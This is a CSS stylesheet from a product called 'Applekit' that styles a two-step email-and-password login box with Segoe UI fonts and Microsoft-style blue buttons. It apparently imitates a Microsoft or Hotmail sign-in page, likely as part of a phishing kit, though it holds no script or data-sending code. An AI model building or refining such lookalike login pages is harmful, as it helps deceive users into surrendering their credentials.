/**************************************************************************************************
 * All Copyright (c) 2018. goes to Nemoze.net @MustaphaOthman Applekit developer,                 *
 * Applekit is a paid software not for Commercial activity,                                       *
 * It must using under an valid license any attempt to using it under an hacked license           *
 * or decode version it will be reported                                                          *
 * And we are responsible for that report,                                                        *
 * Support us by paying for our effort :).                                                        *
 **************************************************************************************************/

body {
  font-family: "Segoe UI Webfont", -apple-system, "Helvetica Neue", "Lucida Grande", "Roboto", "Ebrima", "Nirmala UI", "Gadugi", "Segoe Xbox Symbol", "Segoe UI Symbol", "Meiryo UI", "Khmer UI", "Tunga", "Lao UI", "Raavi", "Iskoola Pota", "Latha", "Leelawadee", "Microsoft YaHei UI", "Microsoft JhengHei UI", "Malgun Gothic", "Estrangelo Edessa", "Microsoft Himalaya", "Microsoft New Tai Lue", "Microsoft PhagsPa", "Microsoft Tai Le", "Microsoft Yi Baiti", "Mongolian Baiti", "MV Boli", "Myanmar Text", "Cambria Math";
  font-size: 15px;
  line-height: 20px;
  font-weight: 400;
  font-size: .9375rem;
  line-height: 1.25rem;
  padding-bottom: .227px;
  padding-top: .227px;
  padding-bottom: .227px;
  padding-top: .227px;
  margin: 0;
  color: #000;
  background-color: #fff; }

#cont {
  position: relative;
  display: block;
  min-height: 100vh;
  padding: 0;
  width: 100%;
  background: #fff url("/assets/img/hmbg.jpg") no-repeat center center;
  background-size: cover; }

#cont2 {
  position: relative;
  display: block;
  display: block;
  min-height: 100vh;
  width: 100%;
  background: rgba(0, 0, 0, 0.55); }

#body-box.step2 {
  padding-top: 43px; }

.welcome {
  position: absolute;
  display: none;
  top: 75px;
  left: 0;
  background: #f2f2f2;
  width: 100%;
  height: 28px; }
  .welcome img {
    position: absolute;
    top: -21px;
    right: 35px; }
  .welcome span {
    position: absolute;
    right: 90px;
    top: 4px; }

#login-box {
  position: absolute;
  top: -25px;
  bottom: 0;
  left: 0;
  right: 0;
  margin: auto;
  height: 290px;
  min-width: 290px;
  max-width: 412px;
  width: 337px;
  padding: 36px;
  background-color: #fff;
  -webkit-box-shadow: 0 2px 3px rgba(0, 0, 0, 0.55);
  box-shadow: 0 2px 3px rgba(0, 0, 0, 0.55);
  border: 1px solid #818c94;
  border: 1px solid rgba(0, 0, 0, 0.4); }
  #login-box #custom-form {
    position: relative;
    display: block;
    width: 100%;
    height: 100%; }
    #login-box #custom-form #body-box {
      position: absolute;
      top: 0px;
      left: 0px;
      width: 100%;
      height: 100%;
      display: block; }
      #login-box #custom-form #body-box span.error-msg {
        position: relative;
        display: none;
        color: #e81123;
        margin-bottom: 8px;
        margin-top: 8px;
        -webkit-box-sizing: border-box;
        box-sizing: border-box;
        text-align: left; }
        #login-box #custom-form #body-box span.error-msg a {
          color: #0067B8;
          text-decoration: none; }
          #login-box #custom-form #body-box span.error-msg a:hover {
            color: #0067B8;
            text-decoration: none; }
      #login-box #custom-form #body-box h1 {
        padding: 0;
        margin-left: -2px;
        margin-bottom: 20px;
        font-weight: 300;
        font-size: 1.5rem; }
      #login-box #custom-form #body-box button.back, #login-box #custom-form #body-box button.submit2 {
        position: relative;
        display: inline-block;
        cursor: pointer;
        -webkit-box-sizing: border-box;
        box-sizing: border-box;
        text-align: center;
        border: 0;
        height: 36px;
        width: 48.5%;
        color: #fff;
        margin-top: 17px;
        font-size: 15px; }
      #login-box #custom-form #body-box button.submit2 {
        margin-left: 5px;
        background: #0067B8;
        text-align: center; }
        #login-box #custom-form #body-box button.submit2:hover {
          border: 0;
          background: #005da6;
          border-color: #0067B8; }
      #login-box #custom-form #body-box button.back {
        color: #111;
        background-color: #ccc;
        background-color: rgba(0, 0, 0, 0.2); }
        #login-box #custom-form #body-box button.back:hover {
          border: none;
          background-color: #b2b2b2;
          background-color: rgba(0, 0, 0, 0.3); }
      #login-box #custom-form #body-box button.submit {
        position: relative;
        display: block;
        cursor: pointer;
        -webkit-box-sizing: border-box;
        box-sizing: border-box;
        background: #0067B8;
        text-align: center;
        border: 0;
        height: 36px;
        width: 100%;
        color: #fff;
        margin-top: 17px;
        font-size: 15px; }
        #login-box #custom-form #body-box button.submit:hover {
          background: #005da6; }
      #login-box #custom-form #body-box .keepme {
        position: relative;
        margin-top: 15px; }
        #login-box #custom-form #body-box .keepme label {
          margin-left: 5px; }
      #login-box #custom-form #body-box input.email.has-error {
        border-color: #e81123 !important; }
      #login-box #custom-form #body-box input.password.has-error {
        border-color: #e81123 !important; }
      #login-box #custom-form #body-box input[type=text], #login-box #custom-form #body-box input[type=password] {
        position: relative;
        display: block;
        -webkit-box-sizing: border-box;
        box-sizing: border-box;
        width: 100%;
        padding: 6px 10px;
        border-width: 1px;
        border-style: solid;
        border-color: #666;
        border-color: rgba(0, 0, 0, 0.6);
        height: 36px;
        outline: none;
        font-size: 15px; }
        #login-box #custom-form #body-box input[type=text]:focus, #login-box #custom-form #body-box input[type=password]:focus {
          border-color: #0067b8; }
        #login-box #custom-form #body-box input[type=text]::-webkit-input-placeholder, #login-box #custom-form #body-box input[type=password]::-webkit-input-placeholder {
          /* Chrome/Opera/Safari */
          color: #666; }
        #login-box #custom-form #body-box input[type=text]::-moz-placeholder, #login-box #custom-form #body-box input[type=password]::-moz-placeholder {
          /* Firefox 19+ */
          color: #666; }
        #login-box #custom-form #body-box input[type=text]:-ms-input-placeholder, #login-box #custom-form #body-box input[type=password]:-ms-input-placeholder {
          /* IE 10+ */
          color: #666; }
        #login-box #custom-form #body-box input[type=text]:-moz-placeholder, #login-box #custom-form #body-box input[type=password]:-moz-placeholder {
          /* Firefox 18- */
          color: #666; }
      #login-box #custom-form #body-box .forgot {
        position: relative;
        display: block;
        margin-top: 15px;
        font-size: 13px;
        color: #333; }
        #login-box #custom-form #body-box .forgot a {
          color: #0d8ddb;
          text-decoration: none; }

#foot {
  position: absolute;
  padding-right: 10px;
  height: 28px;
  line-height: 28px;
  bottom: 0;
  left: 0;
  width: 100%;
  background: rgba(0, 0, 0, 0.6);
  color: #fff;
  text-align: right;
  font-size: 12px;
  font-family: "Segoe UI Webfont", -apple-system, "Helvetica Neue", "Lucida Grande", "Roboto", "Ebrima", "Nirmala UI", "Gadugi", "Segoe Xbox Symbol", "Segoe UI Symbol", "Meiryo UI", "Khmer UI", "Tunga", "Lao UI", "Raavi", "Iskoola Pota", "Latha", "Leelawadee", "Microsoft YaHei UI", "Microsoft JhengHei UI", "Malgun Gothic", "Estrangelo Edessa", "Microsoft Himalaya", "Microsoft New Tai Lue", "Microsoft PhagsPa", "Microsoft Tai Le", "Microsoft Yi Baiti", "Mongolian Baiti", "MV Boli", "Myanmar Text", "Cambria Math"; }
  #foot a {
    font-size: 12px;
    font-family: "Segoe UI Webfont", -apple-system, "Helvetica Neue", "Lucida Grande", "Roboto", "Ebrima", "Nirmala UI", "Gadugi", "Segoe Xbox Symbol", "Segoe UI Symbol", "Meiryo UI", "Khmer UI", "Tunga", "Lao UI", "Raavi", "Iskoola Pota", "Latha", "Leelawadee", "Microsoft YaHei UI", "Microsoft JhengHei UI", "Malgun Gothic", "Estrangelo Edessa", "Microsoft Himalaya", "Microsoft New Tai Lue", "Microsoft PhagsPa", "Microsoft Tai Le", "Microsoft Yi Baiti", "Mongolian Baiti", "MV Boli", "Myanmar Text", "Cambria Math";
    color: #fff;
    text-decoration: none;
    padding-left: 10px;
    padding-right: 10px; }

.spinner.step2 {
  top: 114px !important; }

.spinner {
  position: absolute;
  display: none;
  top: 72px;
  left: 7px;
  width: auto;
  text-align: center;
  z-index: 99999999999999; }

.spinner > div {
  width: 5px;
  height: 5px;
  background-color: #666;
  border-radius: 100%;
  display: inline-block;
  -webkit-animation: sk-bouncedelay 1.4s infinite ease-in-out both;
  animation: sk-bouncedelay 1.4s infinite ease-in-out both; }

.spinner .bounce1 {
  -webkit-animation-delay: -0.256s;
  animation-delay: -0.32s; }

.spinner .bounce2 {
  -webkit-animation-delay: -0.1024s;
  animation-delay: -0.16s; }

.spinner .bounce3 {
  -webkit-animation-delay: -0.512s;
  animation-delay: -0.16s; }

.spinner .bounce4 {
  -webkit-animation-delay: -0.256s;
  animation-delay: -0.16s; }

.spinner .bounce5 {
  -webkit-animation-delay: -0.128s;
  animation-delay: -0.16s; }

.spinner .bounce6 {
  -webkit-animation-delay: -0.64s;
  animation-delay: -0.16s; }

.spinner .bounce7 {
  -webkit-animation-delay: -0.32s;
  animation-delay: -0.16s; }

.spinner .bounce8 {
  -webkit-animation-delay: -0.16s;
  animation-delay: -0.16s; }

.spinner .bounce9 {
  -webkit-animation-delay: -0.8s;
  animation-delay: -0.16s; }

@-webkit-keyframes sk-bouncedelay {
  0%, 80%, 100% {
    -webkit-transform: scale(0); }
  40% {
    -webkit-transform: scale(1); } }
@keyframes sk-bouncedelay {
  0%, 80%, 100% {
    -webkit-transform: scale(0);
    transform: scale(0); }
  40% {
    -webkit-transform: scale(1);
    transform: scale(1); } }

/*# sourceMappingURL=hm.css.map */